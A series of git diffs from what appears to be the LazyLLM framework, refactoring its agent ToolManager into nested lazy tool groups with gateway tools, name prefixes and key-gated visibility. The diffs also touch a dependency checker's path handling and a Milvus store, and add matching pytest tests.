+        self._instance = instance
+        tools = [MethodModuleTool(instance, m) for m in instance.__public_apis__]
+        name = instance.__class__.__name__
+        desc = getattr(type(instance), '__doc__', '') or ''
+        super().__init__(tools=tools, name=name, desc=desc, lazy=True, key_source=key_source)
+
+    @property
+    def _tools(self) -> Dict[str, 'ModuleTool']:
+        return {child.name: child for child in self._children if isinstance(child, ModuleTool)}
 
     def _resolve_one_key(self, source: Union[str, Callable]) -> Optional[str]:
         if callable(source): return source(self._instance) or None
@@ -370,8 +478,17 @@ class ToolManager(ModuleBase):
         for element in tools:
             if isinstance(element, str):
                 _tools.append(self._load_tool_by_name(element))
+            elif isinstance(element, ToolGroup):
+                _tools.append(element)
             elif isinstance(element, ModuleTool):
                 _tools.append(element)
+            elif isinstance(element, dict):
+                assert 'name' in element, "ToolGroup dict must have a 'name' field"
+                assert 'tools' in element, "ToolGroup dict must have a 'tools' field"
+                _tools.append(ToolGroup(
+                    tools=element['tools'], name=element['name'],
+                    desc=element.get('desc', ''), lazy=element.get('lazy', True),
+                ))
             elif isinstance(element, tuple) and len(element) == 2:
                 instance, key_source = element
                 if not hasattr(instance, '__public_apis__'):
@@ -393,7 +510,16 @@ class ToolManager(ModuleBase):
 
     @property
     def tools_description(self) -> List[Dict]:
-        return [x for item in self._tools_desc for x in (item() if callable(item) else [item])]
+        static = [x for item in self._tools_desc for x in (item() if callable(item) else [item])]
+        active_key = f'_active_groups_{self._module_id}'
+        try:
+            workspace = lazyllm_locals['_lazyllm_agent'].get('workspace', {})
+        except Exception:
+            workspace = {}
+        active_groups = workspace.get(active_key, [])
+        extra = [desc for gname in active_groups if gname in self._tool_groups
+                 for desc in self._tool_groups[gname].get_child_descriptions()]
+        return static + extra
 
     @property
     def tools_info(self):
@@ -417,12 +543,37 @@ class ToolManager(ModuleBase):
     def _format_tools(self):
         if isinstance(self._tools, List):
             self._tool_call: Dict[str, ModuleTool] = {}
+            self._tool_groups: Dict[str, ToolGroup] = {}
             for item in self._tools:
-                items = item._tools if isinstance(item, InstanceToolGroup) else {item.name: item}
-                for name, tool in items.items():
-                    if name in self._tool_call:
-                        raise ValueError(f'Duplicate tool name [{name}]. Tool names must be unique.')
-                    self._tool_call[name] = tool
+                if isinstance(item, ToolGroup):
+                    for name, tool in item.get_flat_tools().items():
+                        if name in self._tool_call:
+                            raise ValueError(f'Duplicate tool name [{name}]. Tool names must be unique.')
+                        self._tool_call[name] = tool
+                    if item._lazy and not item.should_skip():
+                        gateway = item.make_gateway_tool(self)
+                        if gateway.name in self._tool_call:
+                            raise ValueError(
+                                f'Duplicate tool name [{gateway.name}]. Tool names must be unique.')
+                        self._tool_call[gateway.name] = gateway
+                        self._tool_groups[item._name] = item
+                        self._register_sub_groups(item)
+                else:
+                    if item.name in self._tool_call:
+                        raise ValueError(f'Duplicate tool name [{item.name}]. Tool names must be unique.')
+                    self._tool_call[item.name] = item
+
+    def _register_sub_groups(self, group: ToolGroup):
+        for child in group._children:
+            if isinstance(child, ToolGroup):
+                if child._lazy:
+                    gateway = child.make_gateway_tool(self)
+                    if gateway.name not in self._tool_call:
+                        self._tool_call[gateway.name] = gateway
+                    self._tool_groups[child._name] = child
+                    self._register_sub_groups(child)
+                else:
+                    self._register_sub_groups(child)
 
     def _transform_to_openai_function(self):
         if not isinstance(self._tools, List):
@@ -430,7 +581,7 @@ class ToolManager(ModuleBase):
 
         format_tools = []
         for item in self._tools:
-            if isinstance(item, InstanceToolGroup):
+            if isinstance(item, ToolGroup):
                 format_tools.append(item.get_description)
             else:
                 try:

--- a/lazyllm/tools/agent/toolsManager.py
+++ b/lazyllm/tools/agent/toolsManager.py
@@ -315,15 +315,12 @@ class ToolGroup:
             else None if prefix is False or prefix is None else prefix
         effective_prefix = f'{_outer_prefix}_{own_prefix}' if _outer_prefix and own_prefix \
             else (_outer_prefix or own_prefix)
-        self._children: List[Union['ModuleTool', 'ToolGroup']] = []
-        for item in tools:
-            built = _build_tool_from_element(item, _outer_prefix=effective_prefix)
-            if built is None:
-                raise TypeError(f'ToolGroup child must be a ModuleTool, ToolGroup, dict, or callable, '
-                                f'got {type(item)}')
-            self._children.append(built)
-        self._gateway_tool: Optional['ModuleTool'] = self.make_gateway_tool() if lazy else None
+        self._children: List[Union['ModuleTool', 'ToolGroup']] = [
+            _build_tool_from_element(item, _outer_prefix=effective_prefix) for item in tools]
         self._precompute_descs(effective_prefix)
+        self._gateway_tool: Optional['ModuleTool'] = self.make_gateway_tool() if lazy else None
+        if self._gateway_desc is None and self._gateway_tool is not None:
+            self._gateway_desc = _build_tool_desc(self._gateway_tool)
 
     def get_flat_tools(self) -> Dict[str, 'ModuleTool']:
         result: Dict[str, ModuleTool] = {}
@@ -337,8 +334,7 @@ class ToolGroup:
         return result
 
     def _precompute_descs(self, effective_prefix: Optional[str] = None):
-        self._gateway_desc: Optional[Dict] = _build_tool_desc(self._gateway_tool) \
-            if self._gateway_tool is not None else None
+        self._gateway_desc: Optional[Dict] = None
         self._expanded_descs: List[Union[Dict, 'ToolGroup']] = []
         self._leaf_names: List[str] = []
         for child in self._children:
@@ -438,8 +434,17 @@ TOOL_CALL_FORMAT_EXAMPLE = (
 
 def _build_tool_from_element(
         element: Any, _outer_prefix: Optional[str] = None) -> Optional[Union['ModuleTool', 'ToolGroup']]:
+    if isinstance(element, str):
+        return _load_tool_by_name(element)
     if isinstance(element, (ToolGroup, ModuleTool)):
         return element
+    if isinstance(element, tuple) and len(element) == 2:
+        instance, key_source = element
+        if not hasattr(instance, '__public_apis__'):
+            raise ValueError(f'Instance {instance!r} does not have __public_apis__')
+        return InstanceToolGroup(instance, key_source)
+    if hasattr(element, '__public_apis__') and not isinstance(element, (ToolGroup, ModuleTool)):
+        return InstanceToolGroup(element)
     if isinstance(element, dict):
         assert 'name' in element, "ToolGroup dict must have a 'name' field"
         assert 'tools' in element, "ToolGroup dict must have a 'tools' field"
@@ -455,38 +460,23 @@ def _build_tool_from_element(
     raise TypeError(f'ToolGroup child must be a ModuleTool, ToolGroup, dict, or callable, got {type(element)}')
 
 
+def _load_tool_by_name(name: str) -> 'ModuleTool':
+    name = name.strip()
+    if '.' not in name: return getattr(lazyllm.tool, name)()
+    target = lazyllm
+    for part in name.split('.'):
+        if not part: raise ValueError(f'invalid tool name: {name}')
+        target = getattr(target, part)
+    return target()
+
+
 class ToolManager(ModuleBase):
     def __init__(self, tools: List[Union[str, Callable]], return_trace: bool = False, sandbox=None):
         super().__init__(return_trace=return_trace)
-        self._tools = self._load_tools(tools)
+        self._tools = [_build_tool_from_element(element) for element in tools]
         self._format_tools()
         self._tools_desc = self._transform_to_openai_function()
         self._sandbox = sandbox
-
-    def _load_tool_by_name(self, name: str) -> 'ModuleTool':
-        name = name.strip()
-        if '.' not in name: return getattr(lazyllm.tool, name)()
-        target = lazyllm
-        for part in name.split('.'):
-            if not part: raise ValueError(f'invalid tool name: {name}')
-            target = getattr(target, part)
-        return target()
-
-    def _load_tools(self, tools: List[Union[str, Callable]]):
-        _tools = []
-        for element in tools:
-            if isinstance(element, str):
-                _tools.append(self._load_tool_by_name(element))
-            elif isinstance(element, tuple) and len(element) == 2:
-                instance, key_source = element
-                if not hasattr(instance, '__public_apis__'):
-                    raise ValueError(f'Instance {instance!r} does not have __public_apis__')
-                _tools.append(InstanceToolGroup(instance, key_source))
-            elif hasattr(element, '__public_apis__') and not isinstance(element, (ToolGroup, ModuleTool)):
-                _tools.append(InstanceToolGroup(element))
-            else:
-                _tools.append(_build_tool_from_element(element))
-        return _tools
 
     @property
     def all_tools(self) -> List[ModuleTool]:

--- a/lazyllm/tools/agent/toolsManager.py
+++ b/lazyllm/tools/agent/toolsManager.py
@@ -482,6 +482,10 @@ def _build_tool_from_element(
         return element
     if isinstance(element, (tuple, list)) and len(element) == 2:
         tool, key_source = element
+        if isinstance(tool, dict) and 'key_source' in tool:
+            raise ValueError(
+                f'key_source is specified both in the dict (dict["key_source"]={tool["key_source"]!r}) '
+                f'and as the second element of the tuple ({key_source!r}). Provide key_source in only one place.')
         if hasattr(tool, '__public_apis__'):
             return InstanceToolGroup(tool, key_source)
         return ToolGroupWrapper(tool, key_source)
@@ -491,9 +495,13 @@ def _build_tool_from_element(
         assert 'name' in element, "ToolGroup dict must have a 'name' field"
         assert 'tools' in element, "ToolGroup dict must have a 'tools' field"
         assert 'desc' in element, "ToolGroup dict must have a 'desc' field"
-        return ToolGroup(tools=element['tools'], name=element['name'], desc=element['desc'],
-                         lazy=element.get('lazy', True), prefix=element.get('prefix', None),
-                         _outer_prefix=_outer_prefix)
+        key_source = element.get('key_source', None)
+        group = ToolGroup(tools=element['tools'], name=element['name'], desc=element['desc'],
+                          lazy=element.get('lazy', True), prefix=element.get('prefix', None),
+                          _outer_prefix=_outer_prefix)
+        if key_source is not None:
+            return ToolGroupWrapper(group, key_source)
+        return group
     if callable(element):
         register('tmp_tool')(element)
         tool = getattr(lazyllm.tmp_tool, element.__name__)()

--- a/lazyllm/tools/git/review/dep_checker.py
+++ b/lazyllm/tools/git/review/dep_checker.py
@@ -26,6 +26,10 @@ class ImportEdge:
 
 # --- path resolution helpers ---
 
+def _relpath(path: str, start: str) -> str:
+    return os.path.relpath(path, start).replace('\\', '/')
+
+
 def _resolve_python_import(
     source_file: str, module: Optional[str], level: int, clone_dir: str,
 ) -> Optional[str]:
@@ -49,10 +53,10 @@ def _resolve_python_import(
     # try xxx.py then xxx/__init__.py
     as_file = candidate_dir + '.py'
     if os.path.isfile(as_file):
-        return os.path.relpath(as_file, clone_dir)
+        return _relpath(as_file, clone_dir)
     init_file = os.path.join(candidate_dir, '__init__.py')
     if os.path.isfile(init_file):
-        return os.path.relpath(init_file, clone_dir)
+        return _relpath(init_file, clone_dir)
     return None
 
 
@@ -65,16 +69,16 @@ def _resolve_js_import(source_file: str, raw_path: str, clone_dir: str) -> Optio
     extensions = ['.js', '.ts', '.jsx', '.tsx', '.mjs', '.cjs']
     # exact match with extension already present
     if os.path.isfile(base):
-        return os.path.relpath(base, clone_dir)
+        return _relpath(base, clone_dir)
     for ext in extensions:
         candidate = base + ext
         if os.path.isfile(candidate):
-            return os.path.relpath(candidate, clone_dir)
+            return _relpath(candidate, clone_dir)
     # directory index
     for idx in ['index.js', 'index.ts', 'index.jsx', 'index.tsx']:
         candidate = os.path.join(base, idx)
         if os.path.isfile(candidate):
-            return os.path.relpath(candidate, clone_dir)
+            return _relpath(candidate, clone_dir)
     return None
 
 
@@ -98,7 +102,7 @@ def _resolve_go_import(raw_path: str, clone_dir: str) -> Optional[str]:
     local = raw_path[len(mod_prefix):].lstrip('/')
     candidate = os.path.join(clone_dir, local)
     if os.path.isdir(candidate):
-        return os.path.relpath(candidate, clone_dir)
+        return _relpath(candidate, clone_dir)
     return None
 
 
@@ -112,7 +116,7 @@ def _resolve_java_import(raw_path: str, clone_dir: str) -> Optional[str]:
     for root in ['src/main/java', 'src', '']:
         candidate = os.path.join(clone_dir, root, rel) if root else os.path.join(clone_dir, rel)
         if os.path.isfile(candidate):
-            return os.path.relpath(candidate, clone_dir)
+            return _relpath(candidate, clone_dir)
     return None
 
 

--- a/lazyllm/tools/git/review/rounds/__init__.py
+++ b/lazyllm/tools/git/review/rounds/__init__.py
@@ -4,13 +4,21 @@
 #                       _rscenario_call_chain, _post_merge_dedup
 
 from .pipeline import _run_review_pipeline
-from .rscene import infer_usage_scenarios
+from .rscene import infer_usage_scenarios, _rscene_collect_modified_file_diffs
 from .rchain import _rscenario_call_chain
 from .post_merge import _post_merge_dedup
+from .common import _split_file_diff_into_chunks, _collect_all_file_diffs, _find_related_small_files
+from .rdedup_merge import _deterministic_dedup, _token_overlap
 
 __all__ = [
     '_run_review_pipeline',
     'infer_usage_scenarios',
     '_rscenario_call_chain',
     '_post_merge_dedup',
+    '_split_file_diff_into_chunks',
+    '_collect_all_file_diffs',
+    '_find_related_small_files',
+    '_deterministic_dedup',
+    '_token_overlap',
+    '_rscene_collect_modified_file_diffs',
 ]

--- a/lazyllm/tools/rag/store/vector/milvus_store.py
+++ b/lazyllm/tools/rag/store/vector/milvus_store.py
@@ -134,6 +134,8 @@ class MilvusStore(EmbedResolveMixin, LazyLLMStoreBase):
         self._embed_datatypes = embed_datatypes or {}
         self._embed = embed or {}
         self._global_metadata_desc = global_metadata_desc or {}
+        if self._index_kwargs is not None and self._embed_datatypes:
+            self._index_kwargs = self.validate_milvus_embed_keys(self._index_kwargs)
         self._set_constants()
 
         self._ddl_lock = threading.Lock()

--- a/tests/advanced_tests/Tools/test_tools_manager.py
+++ b/tests/advanced_tests/Tools/test_tools_manager.py
@@ -444,8 +444,9 @@ class TestToolGroup:
         t1, t2 = self._tool('alpha'), self._tool('beta')
         grp = ToolGroup(tools=[t1, t2], name='grp', desc='Group')
         flat = grp.get_flat_tools()
-        assert 'alpha' in flat
-        assert 'beta' in flat
+        # default prefix=True, so tool names are prefixed with group name
+        assert 'grp_alpha' in flat
+        assert 'grp_beta' in flat
 
     def test_toolgroup_get_description_lazy(self):
         t1 = self._tool('alpha')
@@ -453,15 +454,18 @@ class TestToolGroup:
         descs = grp.get_description()
         assert len(descs) == 1
         assert descs[0]['function']['name'] == 'get_grp_methods'
-        assert descs[0]['function']['description'] == 'My group'
+        # desc = "Get available methods of grp. My group"
+        assert 'Get available methods of grp' in descs[0]['function']['description']
+        assert 'My group' in descs[0]['function']['description']
 
     def test_toolgroup_get_description_eager(self):
         t1, t2 = self._tool('alpha'), self._tool('beta')
         grp = ToolGroup(tools=[t1, t2], name='grp', desc='Group', lazy=False)
         descs = grp.get_description()
         names = [d['function']['name'] for d in descs]
-        assert 'alpha' in names
-        assert 'beta' in names
+        # default prefix=True, so tool names are prefixed with group name
+        assert 'grp_alpha' in names
+        assert 'grp_beta' in names
 
     def test_toolgroup_isolation_across_sessions(self):
         t1, t2 = self._tool('alpha'), self._tool('beta')
@@ -486,3 +490,61 @@ class TestToolGroup:
         assert 'get_grp_methods' in names
         assert 'grp_a' not in names
         assert 'grp_b' not in names
+
+    def test_prefix_true_adds_group_name_to_tool_names(self):
+        t1, t2 = self._tool('alpha'), self._tool('beta')
+        tm = ToolManager([dict(name='grp', desc='Group', lazy=False, prefix=True, tools=[t1, t2])])
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'grp_alpha' in names
+        assert 'grp_beta' in names
+        assert 'alpha' not in names
+        assert 'beta' not in names
+
+    def test_prefix_false_keeps_original_tool_names(self):
+        t1, t2 = self._tool('alpha'), self._tool('beta')
+        tm = ToolManager([dict(name='grp', desc='Group', lazy=False, prefix=False, tools=[t1, t2])])
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'alpha' in names
+        assert 'beta' in names
+        assert 'grp_alpha' not in names
+
+    def test_prefix_false_tool_callable_by_original_name(self):
+        t1 = self._tool('alpha')
+        tm = ToolManager([dict(name='grp', desc='Group', lazy=False, prefix=False, tools=[t1])])
+        assert 'alpha' in tm._tool_call
+        assert 'grp_alpha' not in tm._tool_call
+
+    def test_gateway_available_tools_lists_direct_children_only(self):
+        # 嵌套时 gateway 的 Available tools 只列直接子工具名，不递归展开子 group 的叶子
+        t1 = self._tool('tool_aaa')
+        t2, t3 = self._tool('tool_bbb'), self._tool('tool_ccc')
+        tm = ToolManager([dict(name='outer', desc='Outer', tools=[
+            t1,
+            dict(name='inner', desc='Inner', tools=[t2, t3]),
+        ])])
+        result = tm._tool_call['get_outer_methods']({})
+        assert 'tool_aaa' in result
+        assert 'get_inner_methods' in result
+        assert 'tool_bbb' not in result
+        assert 'tool_ccc' not in result
+
+    def test_eager_inner_leaf_names_included_in_outer_gateway(self):
+        # 非 lazy 子 group 的叶子名直接出现在父 gateway 的 Available tools 里
+        t1, t2, t3 = self._tool('a'), self._tool('b'), self._tool('c')
+        tm = ToolManager([dict(name='outer', desc='Outer', tools=[
+            t1,
+            dict(name='inner', desc='Inner', lazy=False, tools=[t2, t3]),
+        ])])
+        result = tm._tool_call['get_outer_methods']({})
+        assert 'a' in result
+        assert 'b' in result
+        assert 'c' in result
+        assert 'get_inner_methods' not in result
+
+    def test_prefix_propagates_to_nested_group_leaf_names(self):
+        t1 = self._tool('leaf')
+        tm = ToolManager([dict(name='outer', desc='Outer', lazy=False, prefix=True, tools=[
+            dict(name='inner', desc='Inner', lazy=False, prefix=True, tools=[t1]),
+        ])])
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'outer_inner_leaf' in names

--- a/tests/advanced_tests/Tools/test_tools_manager.py
+++ b/tests/advanced_tests/Tools/test_tools_manager.py
@@ -284,7 +284,7 @@ class TestInstanceToolGroup:
         try:
             ToolManager([(NoPublicApis(), 'env.K')])
             raised = False
-        except ValueError:
+        except (ValueError, TypeError):
             raised = True
         assert raised
 
@@ -548,3 +548,119 @@ class TestToolGroup:
         ])])
         names = [d['function']['name'] for d in tm.tools_description]
         assert 'outer_inner_leaf' in names
+
+
+class TestToolGroupWrapper:
+    def setup_method(self):
+        init_session()
+        lazyllm_locals['_lazyllm_agent'] = {'workspace': {}}
+
+    def _tool(self, name: str):
+        return _make_tool_func(name)
+
+    def test_wrapper_with_callable_tool_and_callable_key_present(self):
+        t = self._tool('my_tool')
+        tm = ToolManager([(t, lambda: 'valid-key')])
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'my_tool' in names
+
+    def test_wrapper_with_callable_tool_and_callable_key_missing(self):
+        t = self._tool('my_tool')
+        tm = ToolManager([(t, lambda: '')])
+        assert len(tm.tools_description) == 0
+
+    def test_wrapper_with_callable_key_with_instance_arg(self):
+        t = self._tool('my_tool')
+        called_with = []
+
+        def key_fn(inst):
+            called_with.append(inst)
+            return 'valid'
+
+        tm = ToolManager([(t, key_fn)])
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'my_tool' in names
+        assert called_with == [None]
+
+    def test_wrapper_with_env_key_source(self, monkeypatch):
+        t = self._tool('my_tool')
+        tm = ToolManager([(t, 'env.TEST_WRAPPER_KEY')])
+        assert len(tm.tools_description) == 0
+        monkeypatch.setenv('TEST_WRAPPER_KEY', 'some-val')
+        assert len(tm.tools_description) == 1
+        assert tm.tools_description[0]['function']['name'] == 'my_tool'
+
+    def test_wrapper_with_multi_key_source_any_satisfies(self, monkeypatch):
+        t = self._tool('my_tool')
+        tm = ToolManager([(t, [lambda: '', 'env.TEST_WRAPPER_MULTI_KEY'])])
+        assert len(tm.tools_description) == 0
+        monkeypatch.setenv('TEST_WRAPPER_MULTI_KEY', 'val')
+        assert len(tm.tools_description) == 1
+
+    def test_wrapper_with_toolgroup_inner(self):
+        t1, t2 = self._tool('alpha'), self._tool('beta')
+        grp = ToolGroup(tools=[t1, t2], name='grp', desc='Group', lazy=False, prefix=False)
+        tm = ToolManager([(grp, lambda: 'key')])
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'alpha' in names
+        assert 'beta' in names
+
+    def test_wrapper_with_toolgroup_inner_hidden_when_no_key(self):
+        t1 = self._tool('alpha')
+        grp = ToolGroup(tools=[t1], name='grp', desc='Group', lazy=False, prefix=False)
+        tm = ToolManager([(grp, lambda: '')])
+        assert len(tm.tools_description) == 0
+
+    def test_wrapper_get_flat_tools_contains_inner_tools(self):
+        t = self._tool('my_tool')
+        tm = ToolManager([(t, lambda: 'key')])
+        assert 'my_tool' in tm._tool_call
+
+    def test_wrapper_no_key_source_never_skips(self):
+        from lazyllm.tools.agent.toolsManager import ToolGroupWrapper
+        t = self._tool('my_tool')
+        wrapper = ToolGroupWrapper(t, None)
+        assert wrapper.should_skip() is False
+
+
+class TestSkipMixinNormalizeSource:
+    def test_no_arg_callable_wrapped(self):
+        from lazyllm.tools.agent.toolsManager import SkipMixin
+        called = []
+
+        def no_arg():
+            called.append(1)
+            return 'key'
+
+        mixin = SkipMixin(no_arg)
+        assert not mixin.should_skip()
+        assert called
+
+    def test_one_arg_callable_passed_none(self):
+        from lazyllm.tools.agent.toolsManager import SkipMixin
+        received = []
+
+        def one_arg(inst):
+            received.append(inst)
+            return 'key'
+
+        mixin = SkipMixin(one_arg)
+        assert not mixin.should_skip()
+        assert received == [None]
+
+    def test_list_mixed_callable_normalized(self):
+        from lazyllm.tools.agent.toolsManager import SkipMixin
+
+        def no_arg(): return ''
+        def one_arg(inst): return 'key'  # noqa: E731
+
+        mixin = SkipMixin([no_arg, one_arg])
+        assert not mixin.should_skip()
+
+    def test_defaultonly_arg_callable_treated_as_no_arg(self):
+        from lazyllm.tools.agent.toolsManager import SkipMixin
+
+        def optional_arg(inst=None): return 'key'
+
+        mixin = SkipMixin(optional_arg)
+        assert not mixin.should_skip()

--- a/tests/advanced_tests/Tools/test_tools_manager.py
+++ b/tests/advanced_tests/Tools/test_tools_manager.py
@@ -1,8 +1,10 @@
 import lazyllm
 from lazyllm.tools import ToolManager
-from lazyllm.tools.agent.toolsManager import InstanceToolGroup, _gen_args_info_from_moduletool_and_docstring
-from lazyllm.tools.agent.toolsManager import register
+from lazyllm.tools.agent.toolsManager import (
+    InstanceToolGroup, ToolGroup, _gen_args_info_from_moduletool_and_docstring, register,
+)
 from lazyllm.common import LazyLLMRegisterMetaClass
+from lazyllm import locals as lazyllm_locals, init_session
 from typing import Literal
 
 def _gen_wrapped_moduletool(func):
@@ -271,7 +273,9 @@ class TestInstanceToolGroup:
         tm = ToolManager([(inst, lambda i: i._key)])
         assert len(tm.tools_description) == 0
         inst._key = 'valid-key'
-        assert len(tm.tools_description) == 2
+        # lazy mode: only the gateway tool is exposed initially
+        assert len(tm.tools_description) == 1
+        assert tm.tools_description[0]['function']['name'] == 'get_MockSearchForTest_methods'
 
     def test_tool_manager_raises_without_public_apis(self):
         class NoPublicApis:
@@ -289,4 +293,193 @@ class TestInstanceToolGroup:
         tm = ToolManager([(inst, lambda i: i._key)])
         assert len(tm.tools_description) == 0
         inst._key = 'valid'
-        assert len(tm.tools_description) == len(inst.__public_apis__)
+        # lazy mode: only the gateway tool is exposed initially (1 gateway, not len(public_apis))
+        assert len(tm.tools_description) == 1
+        assert tm.tools_description[0]['function']['name'] == 'get_MockSearchForTest_methods'
+
+
+def _make_tool_func(name: str, param: str = 'x'):
+    def fn(**kwargs): return kwargs.get(param, '')
+    fn.__name__ = name
+    fn.__doc__ = (
+        f'{name} tool.\n\nArgs:\n    {param} (str): input.\n\nReturns:\n    str: output.\n'
+    )
+    import inspect
+    fn.__annotations__ = {param: str, 'return': str}
+    fn.__signature__ = inspect.Signature([inspect.Parameter(param, inspect.Parameter.POSITIONAL_OR_KEYWORD,
+                                                            annotation=str)])
+    return fn
+
+
+class TestToolGroup:
+    def setup_method(self):
+        init_session()
+        lazyllm_locals['_lazyllm_agent'] = {'workspace': {}}
+
+    def _tool(self, name: str):
+        return _make_tool_func(name)
+
+    def test_eager_mode_exposes_all_tools_directly(self):
+        t1, t2 = self._tool('alpha'), self._tool('beta')
+        tm = ToolManager([dict(name='grp', desc='Group', lazy=False, tools=[t1, t2])])
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'alpha' in names
+        assert 'beta' in names
+        assert 'get_grp_methods' not in names
+
+    def test_lazy_mode_exposes_only_gateway_initially(self):
+        t1, t2 = self._tool('alpha'), self._tool('beta')
+        tm = ToolManager([dict(name='grp', desc='Group', lazy=True, tools=[t1, t2])])
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert names == ['get_grp_methods']
+        assert 'alpha' not in names
+        assert 'beta' not in names
+
+    def test_lazy_mode_default_is_lazy(self):
+        t1 = self._tool('alpha')
+        tm = ToolManager([dict(name='grp', desc='Group', tools=[t1])])
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert names == ['get_grp_methods']
+
+    def test_gateway_tool_registered_in_tool_call(self):
+        t1 = self._tool('alpha')
+        tm = ToolManager([dict(name='grp', desc='Group', tools=[t1])])
+        assert 'get_grp_methods' in tm._tool_call
+        assert 'alpha' in tm._tool_call
+
+    def test_gateway_tool_activation_updates_tools_description(self):
+        t1, t2 = self._tool('alpha'), self._tool('beta')
+        tm = ToolManager([dict(name='grp', desc='Group', tools=[t1, t2])])
+        assert [d['function']['name'] for d in tm.tools_description] == ['get_grp_methods']
+
+        gateway = tm._tool_call['get_grp_methods']
+        result = gateway({})
+        assert 'alpha' in result
+        assert 'beta' in result
+
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'get_grp_methods' in names
+        assert 'alpha' in names
+        assert 'beta' in names
+
+    def test_gateway_tool_result_format(self):
+        t1, t2 = self._tool('alpha'), self._tool('beta')
+        tm = ToolManager([dict(name='grp', desc='Group', tools=[t1, t2])])
+        gateway = tm._tool_call['get_grp_methods']
+        result = gateway({})
+        assert result.startswith('Activated tool group "grp".')
+        assert 'alpha' in result
+        assert 'beta' in result
+
+    def test_multilevel_lazy_outer_exposes_outer_gateway(self):
+        t1, t2, t3 = self._tool('a'), self._tool('b'), self._tool('c')
+        tm = ToolManager([dict(name='outer', desc='Outer', tools=[
+            t1,
+            dict(name='inner', desc='Inner', tools=[t2, t3]),
+        ])])
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert names == ['get_outer_methods']
+        assert 'get_inner_methods' not in names
+
+    def test_multilevel_lazy_activating_outer_exposes_inner_gateway(self):
+        t1, t2, t3 = self._tool('a'), self._tool('b'), self._tool('c')
+        tm = ToolManager([dict(name='outer', desc='Outer', tools=[
+            t1,
+            dict(name='inner', desc='Inner', tools=[t2, t3]),
+        ])])
+        tm._tool_call['get_outer_methods']({})
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'get_outer_methods' in names
+        assert 'a' in names
+        assert 'get_inner_methods' in names
+        assert 'b' not in names
+        assert 'c' not in names
+
+    def test_multilevel_lazy_activating_inner_exposes_leaf_tools(self):
+        t1, t2, t3 = self._tool('a'), self._tool('b'), self._tool('c')
+        tm = ToolManager([dict(name='outer', desc='Outer', tools=[
+            t1,
+            dict(name='inner', desc='Inner', tools=[t2, t3]),
+        ])])
+        tm._tool_call['get_outer_methods']({})
+        tm._tool_call['get_inner_methods']({})
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'b' in names
+        assert 'c' in names
+
+    def test_eager_inner_group_exposes_leaf_tools_after_outer_activation(self):
+        t1, t2, t3 = self._tool('a'), self._tool('b'), self._tool('c')
+        tm = ToolManager([dict(name='outer', desc='Outer', tools=[
+            t1,
+            dict(name='inner', desc='Inner', lazy=False, tools=[t2, t3]),
+        ])])
+        tm._tool_call['get_outer_methods']({})
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'a' in names
+        assert 'b' in names
+        assert 'c' in names
+        assert 'get_inner_methods' not in names
+
+    def test_dict_missing_name_raises(self):
+        t1 = self._tool('alpha')
+        try:
+            ToolManager([dict(desc='Group', tools=[t1])])
+            raised = False
+        except AssertionError:
+            raised = True
+        assert raised
+
+    def test_dict_missing_tools_raises(self):
+        try:
+            ToolManager([dict(name='grp', desc='Group')])
+            raised = False
+        except AssertionError:
+            raised = True
+        assert raised
+
+    def test_toolgroup_with_callable_children(self):
+        t1, t2 = self._tool('alpha'), self._tool('beta')
+        grp = ToolGroup(tools=[t1, t2], name='grp', desc='Group')
+        flat = grp.get_flat_tools()
+        assert 'alpha' in flat
+        assert 'beta' in flat
+
+    def test_toolgroup_get_description_lazy(self):
+        t1 = self._tool('alpha')
+        grp = ToolGroup(tools=[t1], name='grp', desc='My group', lazy=True)
+        descs = grp.get_description()
+        assert len(descs) == 1
+        assert descs[0]['function']['name'] == 'get_grp_methods'
+        assert descs[0]['function']['description'] == 'My group'
+
+    def test_toolgroup_get_description_eager(self):
+        t1, t2 = self._tool('alpha'), self._tool('beta')
+        grp = ToolGroup(tools=[t1, t2], name='grp', desc='Group', lazy=False)
+        descs = grp.get_description()
+        names = [d['function']['name'] for d in descs]
+        assert 'alpha' in names
+        assert 'beta' in names
+
+    def test_toolgroup_isolation_across_sessions(self):
+        t1, t2 = self._tool('alpha'), self._tool('beta')
+        tm = ToolManager([dict(name='grp', desc='Group', tools=[t1, t2])])
+
+        init_session()
+        lazyllm_locals['_lazyllm_agent'] = {'workspace': {}}
+        assert [d['function']['name'] for d in tm.tools_description] == ['get_grp_methods']
+
+        tm._tool_call['get_grp_methods']({})
+        assert 'alpha' in [d['function']['name'] for d in tm.tools_description]
+
+        init_session()
+        lazyllm_locals['_lazyllm_agent'] = {'workspace': {}}
+        assert [d['function']['name'] for d in tm.tools_description] == ['get_grp_methods']
+
+    def test_mixed_flat_and_group_tools(self):
+        t1, t2, t3 = self._tool('flat_tool'), self._tool('grp_a'), self._tool('grp_b')
+        tm = ToolManager([t1, dict(name='grp', desc='Group', tools=[t2, t3])])
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'flat_tool' in names
+        assert 'get_grp_methods' in names
+        assert 'grp_a' not in names
+        assert 'grp_b' not in names

--- a/tests/advanced_tests/Tools/test_tools_manager.py
+++ b/tests/advanced_tests/Tools/test_tools_manager.py
@@ -387,6 +387,11 @@ class TestToolGroup:
             t1,
             dict(name='inner', desc='Inner', tools=[t2, t3]),
         ])])
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'a' not in names
+        assert 'b' not in names
+        assert 'c' not in names
+        assert 'get_inner_methods' not in names
         tm._tool_call['get_outer_methods']({})
         names = [d['function']['name'] for d in tm.tools_description]
         assert 'get_outer_methods' not in names
@@ -401,7 +406,15 @@ class TestToolGroup:
             t1,
             dict(name='inner', desc='Inner', tools=[t2, t3]),
         ])])
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'a' not in names
+        assert 'b' not in names
+        assert 'c' not in names
+        assert 'get_inner_methods' not in names
         tm._tool_call['get_outer_methods']({})
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'b' not in names
